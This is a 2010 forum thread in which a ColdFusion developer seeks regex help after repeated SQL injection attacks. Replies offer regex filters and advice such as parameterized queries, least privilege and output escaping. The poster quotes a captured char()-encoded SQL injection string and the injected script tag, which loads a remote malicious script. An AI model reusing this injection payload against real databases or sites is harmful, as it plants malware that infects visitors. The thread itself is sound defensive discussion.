A

Anonymous

Answered

Reguler Expression Help

Forum|Forum|15 years ago
October 5, 2010
2 replies
4003 views

My site is obviously CF and im using sql server 2005 for my database and I have been getting hacked for a couple of days now.

XSS or sql injections and I cant seem to stop it.

I've added portcullis.cfc which is suppose to shop xss and sal injections but it didnt help, I get an email for portcullis stating a user was blocked but the DB is still modified

I changed all cfquerys to stored procedures which I was under the impression would help but nothing, still hacked this morning.

I've updated the server to the latest patches to no avail.

so my last line of defense is "Regular Expressions", reason its my last is I have no clue how to write one.

The offending scrip thats getting injected is "< / t i t l e > < s c r i p t s r c = h t t p : / / g o o g l e - s t a t s 4 9 . i n f o / u r . p h p > </ s c r i p t>"

now where you see stats49, sometimes it is stat49 and other times the 49 is a completly different number

also, there are no spaces in the script but I added them for this purpose as not to inadverntly run the script from this forum

I would appriciate any help I can get in converting this to a Regular expression so I can filter my input

Regards

Craig Wiseman

This topic has been closed for replies.

Correct answer ilssac

I would like to know how to write the regex to checkk for just <script>, then remove that entire line, includign the <title> tag

That should find any <script...>...</script> block.

It says find that string "<script"

plus zero or more characters that are not a closing angle bracket [^>]*

plus zero or more characters that are not an opening angle bracket [^<]*

plus the string </script>

A

Anonymous

Oh, I wrote a database scrubber and I think this is somewhat the form of a RegEx is

" <cfset tmpVar = REReplace(jobDescription, "</title><script src=htt p://google-stats50.info/ur.php></script>", "", "ALL") />
<cfset tmpVar = REReplace(tmpVar, "</title><script src=htt p://goo gle-s tat50.i nfo/ur.php></s cript>", "", "ALL") />
<cfset tmpVar = REReplace(tmpVar, "</title><script src=htt p://google-stats49.info/ur.php></script>", "", "ALL") />
<cfset tmpVar = REReplace(tmpVar, "</title><script src=htt p://google-stats48.info/ur.php></script>", "", "ALL") />
<cfset tmpVar = REReplace(tmpVar, "</title><script src=htt p://google-stats47.info/ur.php></script>", "", "ALL") />
<cfset tmpVar = REReplace(tmpVar, "</title><script src=htt p://google-stats45.info/ur.php></script>", "", "ALL") />
<cfset tmpVar = REReplace(tmpVar, "</title><script src=htt p://google-stats44.info/ur.php></script>", "", "ALL") />
<cfset tmpVar = REReplace(tmpVar, "</title><script src=htt p://google-stats43.info/ur.php></script>", "", "ALL") />
<cfset tmpVar = REReplace(tmpVar, "</title><script src=htt p://google-stats46.info/ur.php></script>", "", "ALL") />
<cfset tmpVar = REReplace(tmpVar, "</title><script src=htt p://google-stats53.info/ur.php></script>", "", "ALL") />
<cfset tmpVar = REReplace(tmpVar, "</title><script src=htt p://google-stats54.info/ur.php></script>", "", "ALL") /> "

but as you see, the attack changes every day, I need something to scrub and validate the data before it hits the DB, getting it out after works albeit, I have to add in a new line just about every day when the number changes.

ilssac

Inspiring

"</title><script src=http://google-stats.*?.info/ur.php></script>"

Should allow you to catch any number, but this is still a very specific filter that will only catch this one attach of the millions of possible variations.

J

JDHoward71

Participant

These scripts generally do the same thing - they have a Base64 or ASCII encoded string which loops through every column in every table in your database and appends some javascript to it, so anywhere you display code from a database the JS will execute. If you post up the entire string we can probably tell you more but believe me when I say - you're wasting your time here.

I work for a hosting company and *every* time someone gets hacked by SQL Injection it's for the same reason - it's through their own fault. If you leave your car unlocked, you can't really blame some skank for nicking your iPod off the front seat. If you don't secure your website properly it'll get hacked, and it's *your* responsibility to fix any security holes as soon as you know about them. None of this "can you restore my site from backup please" then the next day "oh, I've been hacked again, can you restore the site again?". Believe me, it'll happen for the rest of time until you put a proper secure solution in place to stop it - until then unfortunately you're responsible for every person who gets malware on their machine or gets their details phished.

People who "won't invest the money" are the bane of our lives, and more often than not we simply shut their site down, whether that puts them out of business or not. It's irresponsible and it's on a par with people who set their email password to "password" then come crying to us when none of their customers are getting their emails as the account has been used to send spam and they've got the mailserver blacklisted.

Believe me I understand it's not your fault and it's not your money, but what's wrong with this sentence: "I've been dealing with this attack for several weeks now. I'm doing work for a client that does not want to invest in the time/money required". Weeks? You could *easily* have been through setting them all to queryparams by now, and you'd at least have gotten some way to stopping it. Hackers will not get bored, it'll just get worse as word gets around that you have an insecure site.

Sorry for the rant, but as long as people in the world are complaining about spam, viruses and phishing attacks I'll be complaining about people with insecure web forms.

O.

O-

I understand everything that you are saying and have no argument for it.

I just want to clarify though, that I have not been working on it non-stop for a couple of weeks. I have several clients and this one has had the issue pop-up several times over the past couple of weeks. He has me spend 1 hour repairing data and I put a check in my Application.cfm the loops through all the URL and form variables and if it finds any malicious looking input, ends their visit to the site.

There was an attack last night and another this morning and I looked and the data seems to be preserved at this point.

If you'd really like to see the entire string, here it is:


421 update jobSearchStats set userName=cast(userName as varchar(8000))+cast(char(60)+char(47)+char(116)+char(105)+char(116)+char(108)+char(101)+char(62)+char(60)+char(115)+char(99)+char(114)+char(105)+ char(112)+char(116)+char(32)+char(115)+char(114)+char(99)+char(61)+char(104)+char(116)+char(116)+char(112)+char(58)+char(47)+char(47)+char(103) +char(111)+char(111)+char(103)+char(108)+char(101)+char(45)+char(115)+char(116)+char(97)+char(116)+char(115)+char(53)+char(53)+char(46)+char(105) +char(110)+char(102)+char(111)+char(47)+char(117)+char(114)+char(46)+char(112)+char(104)+char(112)+char(62)+char(60)+char(47)+char(115)+char(99) +char(114)+char(105)+char(112)+char(116)+char(62) as varchar(8000))--

421 update jobSearchStats set userName=cast(userName as varchar(8000))+cast(char(60)+char(47)+char(116)+char(105)+char(116)+char(108)+char(101)+char(62)+char(60)+char(115)+char(99)+char(114)+char(105)+

char(112)+char(116)+char(32)+char(115)+char(114)+char(99)+char(61)+char(104)+char(116)+char(116)+char(112)+char(58)+char(47)+char(47)+char(103)

+char(111)+char(111)+char(103)+char(108)+char(101)+char(45)+char(115)+char(116)+char(97)+char(116)+char(115)+char(53)+char(53)+char(46)+char(105)

+char(110)+char(102)+char(111)+char(47)+char(117)+char(114)+char(46)+char(112)+char(104)+char(112)+char(62)+char(60)+char(47)+char(115)+char(99)

+char(114)+char(105)+char(112)+char(116)+char(62) as varchar(8000))--

I know what it is doing. It is trying to append the malicious script to a column in each table to the db.

The attack is originating from 77.78.239.63 which supposedly the SysAdmin blocked all IPs originating from 77.78.239.* but I still see the attacks coming in.

J

ilssac

Inspiring

First of all is it XSS or SQL INJECTION?

Those are two completely different attack vectors and each take different approaches.

For the latter,

make sure all your queries are using <cfqueryparam...>.(With Caveats)
Limit the database user account used by your ColdFusion code to the minimum permissions required to work.
Make sure there isn't any old code hanging around your server that users may be accessing.

For the former

Users are using your forms to input information. Sanitize ALL inputs from clients, form, url, cookie, etc. They all can be manipulated by hackers.
Store AND|OR display all output from database with htmlEdit() or htmlCode() or similar functions that will escape all output rendering XSS code inoperable, though visible.
Consider the XSS protection settings available in the ColdFusion administrator.
Run careful regex filters to clean up the database and or inspect new inputs. Just be aware that this is an arms race against hackers that few developers have the time, knowledge and|or skills to keep up with. For every counter measure filter created today, a clever hacker will figure away around tomorrow.

A

Anonymous

Thaks for the reply ilssac

Thats what im trying to do regarding the RegEx, I just dont know how to write it, I been googling it for 3 days and I still cant get one to work

ilssac

Inspiring

BrantNews wrote:
Thats what im trying to do regarding the RegEx,

Well what are you actually trying to match? What have you tried to do? I.E. What are you requirements. What are your issues. And what have you tried.

Sign up

To post, reply, or follow discussions, please sign in with your Adobe ID.

Sign in to Adobe Community

To post, reply, or follow discussions, please sign in with your Adobe ID.

Scanning file for viruses.

This file cannot be downloaded